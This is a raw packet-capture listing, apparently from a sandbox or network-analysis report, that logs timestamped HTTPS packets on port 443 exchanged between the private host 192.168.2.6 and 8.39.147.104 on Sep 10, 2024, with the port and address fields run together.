                                                                                Sep 10, 2024 16:33:40.285200119 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.285217047 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.285234928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.285389900 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.334989071 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.335042000 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.335119963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.335119963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.335129976 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.335186958 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.335499048 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.335553885 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.335604906 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.335618973 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.335644007 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.335814953 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.335992098 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336044073 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336117029 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.336117029 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.336131096 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336313963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.336338997 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336440086 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336476088 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.336489916 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336549997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.336549997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.336565971 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.336618900 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.337049007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.337090969 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.337197065 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.337197065 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.337203979 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.337245941 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.337497950 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.337539911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.337632895 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.337632895 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.337646961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.337726116 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.338159084 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.338208914 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.338279009 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.338279009 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.338287115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.338985920 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.370163918 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.370188951 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.370244980 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.370251894 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.370277882 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.370362997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.422491074 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.422553062 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.422651052 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.422651052 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.422667027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.422688961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.422739029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.422763109 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.422763109 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.422785997 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.422837019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.422837019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.423305988 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.423350096 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.423408985 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.423417091 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.423427105 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.423819065 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.423858881 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.423899889 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.423949003 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.423955917 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424156904 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.424156904 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.424431086 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424474955 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424527884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.424541950 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424623013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.424623013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.424760103 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424803019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424834013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.424840927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424864054 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425296068 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425429106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.425470114 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.425513983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425513983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425529003 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.425622940 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.456500053 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.456527948 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.456623077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.456623077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.456640959 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.456749916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523576021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523643970 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523653984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523677111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523745060 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523745060 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523912907 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523955107 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523986101 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524007082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524039984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524039984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524398088 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524446011 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524480104 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524487019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524527073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524527073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525257111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525279999 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525336027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525399923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525427103 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525490999 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525542974 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525585890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525672913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525672913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525691032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525726080 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.526071072 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.526117086 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.526194096 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.526194096 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.526201963 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.526328087 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.526752949 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.526923895 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.526966095 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.527034998 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.527034998 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.527044058 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.527417898 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.527417898 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.548536062 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.548552036 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.548597097 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.548604012 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.548760891 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.574158907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.621686935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.621717930 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.621908903 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.621908903 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.621928930 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622061968 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.622179031 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622195005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622243881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.622263908 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622279882 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.622361898 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.622616053 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622632980 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622665882 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.622673035 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.622706890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.622806072 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.623051882 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.623069048 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.623135090 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.623143911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.623184919 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.623718023 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.623759985 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.623795986 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.623804092 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.623842001 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.623991013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.623991966 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624022961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624073029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624075890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.624075890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.624099016 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624156952 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.624221087 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.624617100 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624659061 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624681950 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.624690056 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.624726057 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.624741077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.634912968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.634959936 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.635035038 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.635045052 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.635072947 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.635092020 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.647054911 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.708410025 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.708427906 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.708478928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.708503008 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.708525896 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.708657026 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.708667994 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.708678007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.708693981 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.708745956 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.708854914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.709289074 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.709306955 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.709362030 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.709369898 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.709429026 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.709429026 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.709759951 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.709778070 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.709821939 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.709832907 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.709845066 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.709964037 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.710059881 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.710074902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.710115910 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.710133076 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.710155010 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.710165024 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.710680962 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.710696936 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.710727930 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.710736990 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.710764885 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.710866928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.711224079 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.711240053 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.711371899 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.711371899 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.711380959 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.711431980 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.726768970 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.726785898 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.726903915 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.726903915 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.726913929 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.726950884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.766228914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.794487953 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.794504881 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.794585943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.794596910 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.794641972 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.794641972 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.794795036 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.794811964 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.794904947 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.794904947 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.794924021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.795011044 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.795327902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.795342922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.795407057 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.795416117 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.795430899 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.795564890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.795842886 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.795859098 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.795981884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.795981884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.795993090 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796087027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.796292067 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796308041 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796428919 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.796430111 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.796439886 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796483994 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.796657085 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796670914 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796786070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.796786070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.796794891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.796853065 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.797152996 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.797175884 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.797249079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.797249079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.797256947 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.797300100 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.813138962 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.813157082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.813251019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.813261032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.813332081 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.882786989 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.882817984 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.882879972 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.882939100 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.882939100 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.882939100 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.882962942 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.882982016 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883001089 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883131027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.883131027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.883143902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883157015 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883291960 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.883513927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883538961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883634090 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883657932 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.883665085 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.883771896 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.883771896 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.885087013 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.885102034 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.885216951 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.885222912 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.885238886 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.899858952 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.899879932 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.900012016 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.900012016 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.900031090 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.900124073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.054675102 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.054693937 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.054713011 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.054739952 CEST443497188.39.147.104192.168.2.6
